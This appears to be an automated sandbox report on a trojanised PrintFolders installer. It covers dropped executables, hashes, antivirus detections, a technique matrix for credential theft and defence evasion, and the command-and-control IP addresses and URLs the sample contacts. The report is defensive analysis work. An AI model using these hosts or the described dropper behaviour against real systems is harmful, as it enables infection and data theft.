                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                Source: C:\Program Files (x86)\PrintFolders\ntFolders.exeCode function: 2_2_0040F7F3 cpuid
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00455B2C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,6D705CA0,SetNamedPipeHandleState,6DB77180,CloseHandle,CloseHandle,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026C4 GetSystemTime,
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405CB0 GetVersionExA,
                Source: C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmpCode function: 1_2_00453A24 GetUserNameA,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.ntFolders.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ntFolders.exe.3160000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ntFolders.exe.3160000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.ntFolders.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.393868626.0000000001740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.393249857.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.394218193.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Windows Management Instrumentation
                Path Interception1
                Access Token Manipulation
                2
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts13
                Process Injection
                1
                Disable or Modify Tools
                LSASS Memory141
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Native API
                Logon Script (Windows)Logon Script (Windows)1
                Access Token Manipulation
                Security Account Manager3
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
                Process Injection
                NTDS11
                Application Window Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer11
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Account Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common3
                Obfuscated Files or Information
                Cached Domain Credentials1
                System Owner/User Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items23
                Software Packing
                DCSync3
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem26
                System Information Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 764043 Sample: file.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 96 47 45.139.105.1 CMCSUS Italy 2->47 49 85.31.46.167 CLOUDCOMPUTINGDE Germany 2->49 51 Snort IDS alert for network traffic 2->51 53 Antivirus detection for URL or domain 2->53 55 Detected unpacking (changes PE section rights) 2->55 57 4 other signatures 2->57 10 file.exe 2 2->10         started        signatures3 process4 file5 31 C:\Users\user\AppData\Local\...\is-I19BM.tmp, PE32 10->31 dropped 13 is-I19BM.tmp 13 21 10->13         started        process6 file7 33 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 13->33 dropped 35 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 13->35 dropped 37 C:\...\unins000.exe (copy), PE32 13->37 dropped 39 5 other files (4 malicious) 13->39 dropped 16 ntFolders.exe 20 13->16         started        process8 dnsIp9 41 107.182.129.235, 49692, 80 META-ASUS Reserved 16->41 43 171.22.30.106, 49693, 80 CMCSUS Germany 16->43 45 45.139.105.171, 49691, 80 CMCSUS Italy 16->45 29 C:\Users\user\AppData\Roaming\...\karcA17.exe, PE32 16->29 dropped 20 karcA17.exe 16->20         started        23 cmd.exe 1 16->23         started        file10 process11 signatures12 59 Multi AV Scanner detection for dropped file 20->59 25 taskkill.exe 1 23->25         started        27 conhost.exe 23->27         started        process13

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\PrintFolders\ntFolders.exe100%Joe Sandbox ML
                C:\Program Files (x86)\PrintFolders\Russian.dll (copy)0%ReversingLabs
                C:\Program Files (x86)\PrintFolders\is-RBTTG.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_iscrypt.dll2%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_setup64.tmp0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\is-SBKH0.tmp\_isetup\_shfoldr.dll2%ReversingLabs
                C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\karcA17.exe50%ReversingLabsWin32.Trojan.Generic
                SourceDetectionScannerLabelLinkDownload
                2.2.ntFolders.exe.400000.0.unpack100%AviraHEUR/AGEN.1250671Download File
                0.0.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                0.3.file.exe.2118000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
                0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
                2.2.ntFolders.exe.10000000.6.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                1.2.is-I19BM.tmp.400000.0.unpack100%AviraHEUR/AGEN.1232832Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.innosetup.com/0%URL Reputationsafe
                http://www.remobjects.com/?ps0%URL Reputationsafe
                http://www.remobjects.com/?ps0%URL Reputationsafe
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte0%URL Reputationsafe
                http://www.innosetup.com0%URL Reputationsafe
                http://107.182.129.235/storage/ping.php0%URL Reputationsafe
                http://171.22.30.106/library.php100%URL Reputationmalware
                http://107.182.129.235/storage/extension.php0%URL Reputationsafe
                http://www.remobjects.com/?psU0%URL Reputationsafe
                http://www.innosetup.comDVarFileInfo$0%Avira URL Cloudsafe
                http://171.22.30.106/library.phpH100%Avira URL Cloudmalware
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixintetrue
                • URL Reputation: safe
                unknown
                http://107.182.129.235/storage/ping.phptrue
                • URL Reputation: safe
                unknown
                http://171.22.30.106/library.phptrue
                • URL Reputation: malware
                unknown
                http://107.182.129.235/storage/extension.phptrue
                • URL Reputation: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.innosetup.com/is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                http://171.22.30.106/library.phpHntFolders.exe, 00000002.00000002.394014970.0000000001844000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://www.remobjects.com/?psfile.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.innosetup.comfile.exefalse
                • URL Reputation: safe
                unknown
                http://www.innosetup.comDVarFileInfo$file.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000002.395161258.00000000004BC000.00000002.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drfalse
                • Avira URL Cloud: safe
                low
                http://www.remobjects.com/?psUfile.exe, 00000000.00000003.306222785.0000000002200000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.306408655.0000000002118000.00000004.00001000.00020000.00000000.sdmp, is-I19BM.tmp, 00000001.00000000.306831625.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-I19BM.tmp.0.dr, is-K96P8.tmp.1.drfalse
                • URL Reputation: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.139.105.171
                unknownItaly
                33657CMCSUStrue
                45.139.105.1
                unknownItaly
                33657CMCSUStrue
                85.31.46.167
                unknownGermany
                43659CLOUDCOMPUTINGDEtrue
                107.182.129.235
                unknownReserved
                11070META-ASUStrue
                171.22.30.106
                unknownGermany
                33657CMCSUStrue
                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:764043
                Start date and time:2022-12-09 11:01:11 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 6s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:7
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal96.troj.evad.winEXE@12/23@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 41.9% (good quality ratio 41%)
                • Quality average: 85.5%
                • Quality standard deviation: 22.8%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • TCP Packets have been reduced to 100
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                TimeTypeDescription
                11:02:14API Interceptor1x Sleep call for process: karcA17.exe modified
                No context
                No context
                No context
                No context
                No context
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:MS Windows HtmlHelp Data
                Category:dropped
                Size (bytes):118869
                Entropy (8bit):7.933172616287708
                Encrypted:false
                SSDEEP:1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
                MD5:204A5BF160646F9A55ED70AB6E1A07A6
                SHA1:5404AB219FA01C270ADC36303D447109503C4A4D
                SHA-256:CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
                SHA-512:6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................U...............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR......./#ITBITS..../#STRINGS...>.../#SYSTEM..V.../#TOPICS....`./#URLSTR...Gw./#URLTBL....H./#WINDOWS.....D./$FIftiMain...g..8./$OBJINST...T.../author.htm...m.<./cmdline.htm...O.../ctxmenu.jpg...3..B./index.htm..'.y./interface.htm.. .^./logo.jpg...P..4./main.css...u.../PrintDir.hhc...).'./screenshot.jpg.....././shell.htm...~.Q.::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content..[...,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable...P...........
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):5403
                Entropy (8bit):4.918324842676727
                Encrypted:false
                SSDEEP:96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
                MD5:C8B211D81EB7D4F9EBB071A117444D51
                SHA1:43BF57BB0931EBED953FE17F937C1C7FF58A027C
                SHA-256:AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
                SHA-512:C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
                Malicious:false
                Preview:=====================.. History of Releases..=====================....Legend..------..[+] - added..[*] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[*] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[*] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[*] Faster processing of large numbers of files..[*] Folders containing no files acc
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:RAGE Package Format (RPF),
                Category:dropped
                Size (bytes):3391
                Entropy (8bit):4.812121234949207
                Encrypted:false
                SSDEEP:96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
                MD5:A5E8094B0CBADE929AEE07F5DA5E9429
                SHA1:60BB56A380CD9126AC067AE39B262E28A22532CD
                SHA-256:F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
                SHA-512:018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
                Malicious:false
                Preview:PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):21504
                Entropy (8bit):4.508743257769972
                Encrypted:false
                SSDEEP:192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
                MD5:4FB606EDBDE8EFB6D34E6E1BC5F677F1
                SHA1:F8F094064D107384E619DED1139932AA38476272
                SHA-256:A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
                SHA-512:5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.............5...............5......Rich....................PE..L....SwO...........!.........P...............................................p............@.......................................... ..`M...........................................................................................................rdata..m...........................@..@.rsrc...`M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:data
                Category:dropped
                Size (bytes):3602504
                Entropy (8bit):5.8368779870150345
                Encrypted:false
                SSDEEP:98304:Z3O+M+AbmcsW7AfGFVXgMUP31PkZtXEknL1K:sKgaUK
                MD5:9DF53593153D2E4306BBD631651FAAA5
                SHA1:1D5BDD8D616DA78DE7873CA5F677AE278A456F52
                SHA-256:F56698F56D213A36ACA4D618A7E8D99F8C9D0EA7F35EEA06BBDF5C5B59BFA779
                SHA-512:656E2E7A9B7D6C19DDFEA437FE0866D649DB784081403945A8651B887773073649B73295E468509A6CF1DFC5D1E7D0F787F77A468678F244B4BCAE93FBC0CE42
                Malicious:false
                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........B..........P....................@...................................7..............................................`...............................................................................................................text..."........................... ..`.rdata...6.......@..................@..@.data...0....@.......@..............@....tls.........P.......P..............@....rsrc........`.......`..............@..@.aud104...+..P..H.+..P..............`...................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:MS Windows HtmlHelp Data
                Category:dropped
                Size (bytes):118869
                Entropy (8bit):7.933172616287708
                Encrypted:false
                SSDEEP:1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
                MD5:204A5BF160646F9A55ED70AB6E1A07A6
                SHA1:5404AB219FA01C270ADC36303D447109503C4A4D
                SHA-256:CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
                SHA-512:6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
                Malicious:false
                Preview:ITSF....`..................|.{.......".....|.{......."..`...............x.......T.......................U...............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR......./#ITBITS..../#STRINGS...>.../#SYSTEM..V.../#TOPICS....`./#URLSTR...Gw./#URLTBL....H./#WINDOWS.....D./$FIftiMain...g..8./$OBJINST...T.../author.htm...m.<./cmdline.htm...O.../ctxmenu.jpg...3..B./index.htm..'.y./interface.htm.. .^./logo.jpg...P..4./main.css...u.../PrintDir.hhc...).'./screenshot.jpg.....././shell.htm...~.Q.::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content..[...,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable...P...........
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:RAGE Package Format (RPF),
                Category:dropped
                Size (bytes):3391
                Entropy (8bit):4.812121234949207
                Encrypted:false
                SSDEEP:96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
                MD5:A5E8094B0CBADE929AEE07F5DA5E9429
                SHA1:60BB56A380CD9126AC067AE39B262E28A22532CD
                SHA-256:F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
                SHA-512:018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
                Malicious:false
                Preview:PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):714506
                Entropy (8bit):6.488639273564823
                Encrypted:false
                SSDEEP:12288:Ih5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOZ:q5NoqWolrP837JzHvA6yknyWFxvVxOZ
                MD5:F82EF8A460249A7A71B8DA396C651027
                SHA1:1BA036C9860EB581550998DA24980CC63CD7E2C9
                SHA-256:B7B477D0DE6348FAEA68869B86782B2859AC302A0DFE5C91B94CE65CFAD31218
                SHA-512:F331C2149313896A37AD0F268EB83EFF75B1A65EE1372185F02558F49BB4E0DE2BF9565D93DEF6A0009D37A2CDC297CC14108629CDBE168FDDA202470BEBE31A
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):21504
                Entropy (8bit):4.508743257769972
                Encrypted:false
                SSDEEP:192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
                MD5:4FB606EDBDE8EFB6D34E6E1BC5F677F1
                SHA1:F8F094064D107384E619DED1139932AA38476272
                SHA-256:A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
                SHA-512:5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.............5...............5......Rich....................PE..L....SwO...........!.........P...............................................p............@.......................................... ..`M...........................................................................................................rdata..m...........................@..@.rsrc...`M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):5403
                Entropy (8bit):4.918324842676727
                Encrypted:false
                SSDEEP:96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
                MD5:C8B211D81EB7D4F9EBB071A117444D51
                SHA1:43BF57BB0931EBED953FE17F937C1C7FF58A027C
                SHA-256:AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
                SHA-512:C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
                Malicious:false
                Preview:=====================.. History of Releases..=====================....Legend..------..[+] - added..[*] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[*] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[*] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[*] Faster processing of large numbers of files..[*] Folders containing no files acc
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:modified
                Size (bytes):3602504
                Entropy (8bit):5.836878591136461
                Encrypted:false
                SSDEEP:98304:I3O+M+AbmcsW7AfGFVXgMUP31PkZtXEknL1K:BKgaUK
                MD5:D9A39F6C4EEDC8F1B89E30D35012D6B4
                SHA1:6B995728348DA6F3D77F9D30D8D698C8D9DC58A6
                SHA-256:6ADB7A807679CDB8B473A987BB42253EE9C64D5ED137F58C8E99B1E5314C8607
                SHA-512:3C19F677A2BE3D6E75583D655A3C09DA2F5659A58E17F0A60BB29A1CBB4CBF83B779925103D5F663D1E20C6E6BD23CF7715DA3D226AA07ACA30E4D233EA1458E
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c..........B..........P....................@...................................7..............................................`...............................................................................................................text..."........................... ..`.rdata...6.......@..................@..@.data...0....@.......@..............@....tls.........P.......P..............@....rsrc........`.......`..............@..@.aud104...+..P..H.+..P..............`...................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:InnoSetup Log PrintFolders {3C248D7A-78F2-476F-86FF-34610A9B2E85}, version 0x2a, 3804 bytes, 320366\user, "C:\Program Files (x86)\PrintFolders"
                Category:dropped
                Size (bytes):3804
                Entropy (8bit):4.497837488733423
                Encrypted:false
                SSDEEP:48:zX8myMHLBv8iD86plmlDFoIN0hqkLVO3471qVToa0zA47bJMuGT:Brp8iD86p4lJoIyhqYOIh0XF
                MD5:02B48BE9B78F86E1872D2FD95908AE0B
                SHA1:C72A4E9BBAA57A03ECF5DD74925394E45F791C47
                SHA-256:DE199B6A2F5065AD731A6BD5C9D80050791BA78BCD6963B758FD13FBF647CA84
                SHA-512:68458F599618DB47A15EC15E6537863A980E3443024BD61F649E85FE37A8D4571FB989453B20CCE2384021666EA5876E275E9874172A0A403ACEB7B6232C3950
                Malicious:false
